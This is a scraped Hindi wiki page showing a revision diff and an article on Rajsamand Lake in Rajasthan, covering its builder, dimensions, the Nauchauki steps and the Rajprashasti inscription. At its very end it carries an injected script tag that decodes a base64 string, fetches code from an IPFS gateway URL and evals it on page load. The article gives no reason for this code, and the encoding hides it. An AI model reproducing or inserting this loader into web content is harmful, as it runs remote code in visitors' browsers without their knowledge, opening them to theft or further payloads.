Difference between revisions of "राजसमन्द झील"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
 
(One intermediate revision by the same user not shown)
Line 17: Line 17:
 
|शीर्षक 1=निर्माता
 
|शीर्षक 1=निर्माता
 
|पाठ 1=महाराणा राजसिंह  
 
|पाठ 1=महाराणा राजसिंह  
|शीर्षक 2=निर्माण काल
+
|शीर्षक 2=निर्माण काल
 
|पाठ 2=1660 ई.
 
|पाठ 2=1660 ई.
 
|अन्य जानकारी=
 
|अन्य जानकारी=
Line 28: Line 28:
 
*सात किलोमीटर लम्बी व तीन किलोमीटर चौडी यह झील 55 फीट गहरी है।
 
*सात किलोमीटर लम्बी व तीन किलोमीटर चौडी यह झील 55 फीट गहरी है।
 
*राजसमन्द झील की पाल, नौचौकी व इस ख़ूबसूरत झील के पाल पर बनी छतरियों की छतों, स्तम्भों तथा तोरण द्वार पर की गयी [[मूर्तिकला]] व नक़्क़ाशी देखकर स्वतः ही दिलवाड़ा के जैन मंदिरों की याद आ जाती है।
 
*राजसमन्द झील की पाल, नौचौकी व इस ख़ूबसूरत झील के पाल पर बनी छतरियों की छतों, स्तम्भों तथा तोरण द्वार पर की गयी [[मूर्तिकला]] व नक़्क़ाशी देखकर स्वतः ही दिलवाड़ा के जैन मंदिरों की याद आ जाती है।
*[[झील]] के किनारे की सीढ़ियों को हर तरफ़ से गिनने पर योग नौ ही होता है, इसलिए इसे 'नौचौकी' कहा जाता है। यहीं पर 25 काले संगमरमर की चट्टानों पर [[मेवाड़]] का पूरा [[इतिहास]] [[संस्कृत]] में उत्कीर्ण है। इसे 'राजप्रशस्ति' कहते हैं, जो की संसार की सबसे बड़ी प्रशस्ति है।
+
*[[झील]] के किनारे की सीढ़ियों को हर तरफ़ से गिनने पर योग नौ ही होता है, इसलिए इसे 'नौचौकी' कहा जाता है। यहीं पर 25 काले संगमरमर की चट्टानों पर [[मेवाड़]] का पूरा [[इतिहास]] [[संस्कृत]] में उत्कीर्ण है। इसे 'राजप्रशस्ति' कहते हैं, जो की संसार की सबसे बड़ी प्रशस्ति है।<ref>{{cite web |url=http://rajasthangyan.com/notes_explain.jsp?tid=0&nid=12 |title= राजस्थान की सिंचाई परियोजनाएँ|accessmonthday=10 फ़रवरी |accessyear=2017 |last= |first= |authorlink= |format= |publisher=rajasthangyan.com |language= हिन्दी}}</ref>
 
*राजप्रशस्ति 'अमरकाव्य वंशावली' नामक पुस्तक पर आधारित है, जिसके लेखक रणछोड़ भट्ट तैलंग हैं।
 
*राजप्रशस्ति 'अमरकाव्य वंशावली' नामक पुस्तक पर आधारित है, जिसके लेखक रणछोड़ भट्ट तैलंग हैं।
 
*राजसमन्द झील के किनारे पर घेवर माता का मन्दिर है।
 
*राजसमन्द झील के किनारे पर घेवर माता का मन्दिर है।
Line 34: Line 34:
  
 
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक1|माध्यमिक=|पूर्णता=|शोध=}}
 
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक1|माध्यमिक=|पूर्णता=|शोध=}}
 +
==टीका टिप्पणी और संदर्भ==
 +
<references/>
 
==संबंधित लेख==
 
==संबंधित लेख==
 
{{राजस्थान की झीलें}}{{भारत की झीलें}}{{राजस्थान के पर्यटन स्थल}}
 
{{राजस्थान की झीलें}}{{भारत की झीलें}}{{राजस्थान के पर्यटन स्थल}}
 
[[Category:राजस्थान]][[Category:राजस्थान_के_पर्यटन_स्थल]][[Category:पर्यटन कोश]][[Category:राजस्थान की झीलें]][[Category:भारत की झीलें]][[Category:भूगोल कोश]]
 
[[Category:राजस्थान]][[Category:राजस्थान_के_पर्यटन_स्थल]][[Category:पर्यटन कोश]][[Category:राजस्थान की झीलें]][[Category:भारत की झीलें]][[Category:भूगोल कोश]]
 
__INDEX__
 
__INDEX__

Latest revision as of 10:27, 10 February 2017

rajasamand jhil
nam rajasamand jhil
desh bharat
rajy rajasthan
nagar/zila rajasamand
nirdeshaank 25.07° uttar - 73.88° poorv
adhikatam lanbaee 6.4 kimi (lagabhag)
adhikatam gaharaee 18 mitar (lagabhag)
adhikatam chau daee 2.82 kimi (lagabhag)
googal manachitr googal manachitr
nirmata maharana rajasianh
nirman kal 1660 ee.
bahari k diyaan jhil ke kinare ki sidhiyoan ko har taraph se ginane par yog 9 hi hota hai, isalie ise nauchauki kaha jata haian.
adyatan‎

rajasamand jhil rajasthan ke shahar rajasamand mean sthit hai. is jhil ka nirman meva d ke raja rajasianh ne gomati nadi ka pani rokakar (1662-76 ee.) karavaya tha.

  • chalis lakh rupaye ki lagat se banavaee gee rajasamand jhil meva d ki vishalatam jhiloan mean se ek hai.
  • is jhil ka nirman gomati, kelava tatha tali nadiyoan par baandh banakar kiya gaya hai.
  • sat kilomitar lambi v tin kilomitar chaudi yah jhil 55 phit gahari hai.
  • rajasamand jhil ki pal, nauchauki v is khoobasoorat jhil ke pal par bani chhatariyoan ki chhatoan, stambhoan tatha toran dvar par ki gayi moortikala v naqqashi dekhakar svatah hi dilava da ke jain mandiroan ki yad a jati hai.
  • jhil ke kinare ki sidhiyoan ko har taraf se ginane par yog nau hi hota hai, isalie ise 'nauchauki' kaha jata hai. yahian par 25 kale sangamaramar ki chattanoan par meva d ka poora itihas sanskrit mean utkirn hai. ise 'rajaprashasti' kahate haian, jo ki sansar ki sabase b di prashasti hai.[1]
  • rajaprashasti 'amarakavy vanshavali' namak pustak par adharit hai, jisake lekhak ranachho d bhatt tailang haian.
  • rajasamand jhil ke kinare par ghevar mata ka mandir hai.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

  1. rajasthan ki sianchaee pariyojanaean (hindi) rajasthangyan.com. abhigaman tithi: 10 faravari, 2017.

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>